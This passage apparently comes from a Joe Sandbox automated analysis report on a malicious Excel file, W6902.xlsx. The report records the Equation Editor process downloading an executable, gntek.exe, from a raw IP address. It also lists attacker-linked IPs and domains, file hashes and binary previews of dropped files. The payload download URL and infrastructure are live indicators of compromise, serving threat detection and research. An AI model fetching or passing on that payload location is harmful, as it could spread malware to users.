                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      212.192.246.120
                                                      		unknownRussian Federation
                                                      		205220RHC-HOSTINGGBtrue
                                                      1.32.255.137
                                                      		www.927291.comSingapore
                                                      		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                      37.123.118.150
                                                      		www.teentykarm.questUnited Kingdom
                                                      		13213UK2NET-ASGBtrue
                                                      172.217.168.19
                                                      		ghs.googlehosted.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      194.5.156.29
                                                      		zoharfine.comGermany
                                                      		47583AS-HOSTINGERLTtrue

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:562479
                                                      Start date:28.01.2022
                                                      Start time:22:36:09
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 51s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:W6902.xlsx
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winXLSX@9/24@6/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 40.5% (good quality ratio 38.6%)
                                                      • Quality average: 70.7%
                                                      • Quality standard deviation: 29%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • VT rate limit hit for: W6902.xlsx

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      22:36:38API Interceptor42x Sleep call for process: EQNEDT32.EXE modified
                                                      22:36:46API Interceptor35x Sleep call for process: vbc.exe modified
                                                      22:37:05API Interceptor164x Sleep call for process: msdt.exe modified
                                                      22:37:57API Interceptor1x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:downloaded
                                                      Size (bytes):254186
                                                      Entropy (8bit):7.930341504736443
                                                      Encrypted:false
                                                      SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                                      MD5:C2CA2BA9C38EB02217588662717BA6C3
                                                      SHA1:8A897F24D2E564AF2C2FCC272AB0CFBEF10611B5
                                                      SHA-256:9AF4D9EF8B2A850854AE23411D44D3603147C26898BCA1010FD2F9B16F6D456E
                                                      SHA-512:7C7A80F37013B8B5FE27E0C9C3144884ABDE6CA49484C3E8C6CC78DAA9F3B6AC890577247223E7D4875B865244E8732840C6A47170FBE2C7F27406BA4C8F52A6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                      Reputation:low
                                                      IE Cache URL:http://212.192.246.120/gntek.exe
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D23A896.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):5396
                                                      Entropy (8bit):7.915293088075047
                                                      Encrypted:false
                                                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26A1539F.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):11303
                                                      Entropy (8bit):7.909402464702408
                                                      Encrypted:false
                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                      Malicious:false
                                                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C2EB30D.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):11303
                                                      Entropy (8bit):7.909402464702408
                                                      Encrypted:false
                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                      Malicious:false
                                                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\491E45A3.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3747
                                                      Entropy (8bit):7.932023348968795
                                                      Encrypted:false
                                                      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                      Malicious:false
                                                      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55FB45AA.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):10202
                                                      Entropy (8bit):7.870143202588524
                                                      Encrypted:false
                                                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                      Malicious:false
                                                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68099914.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):10202
                                                      Entropy (8bit):7.870143202588524
                                                      Encrypted:false
                                                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                      Malicious:false
                                                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C3F2A9.jpeg

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                      Category:dropped
                                                      Size (bytes):4396
                                                      Entropy (8bit):7.884233298494423
                                                      Encrypted:false
                                                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                      Malicious:false
                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\724DFD67.jpeg

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                      Category:dropped
                                                      Size (bytes):4396
                                                      Entropy (8bit):7.884233298494423
                                                      Encrypted:false
                                                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                      Malicious:false
                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83D9E331.emf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):1099960
                                                      Entropy (8bit):2.0153836624759336
                                                      Encrypted:false
                                                      SSDEEP:3072:LXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:RahIFdyiaT2qtXl
                                                      MD5:9CF22C4EBFAE36D30FABB19131DA97C9
                                                      SHA1:DBC31C309645F444F5B0B1062185CA4529BC8BF5
                                                      SHA-256:0FC72744A15E95D73D1441DAD1811B6D4B434966C5035C2F13318E426A9511B4
                                                      SHA-512:4E054657A67A89CB79763EFD9FE2D474E403BC114E5C559382B7EAA4C5EF2DBE49647C15EE9289581C223B56E93A1ADBAC43396A4459692DF810838EFECDE509
                                                      Malicious:false
                                                      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................\V$...(./..ffV.@..%...../.H./......./.,./.RQ.W../.../......./.../.$Q.W../.../. ...IdfV../.../. .........4..dfV............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........8./.X...../.../..8^V......4.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93337B48.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2647
                                                      Entropy (8bit):7.8900124483490135
                                                      Encrypted:false
                                                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                      Malicious:false
                                                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FFBE83C.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):5396
                                                      Entropy (8bit):7.915293088075047
                                                      Encrypted:false
                                                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                                      Malicious:false
                                                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B25F0F7E.png

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2647
                                                      Entropy (8bit):7.8900124483490135
                                                      Encrypted:false
                                                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
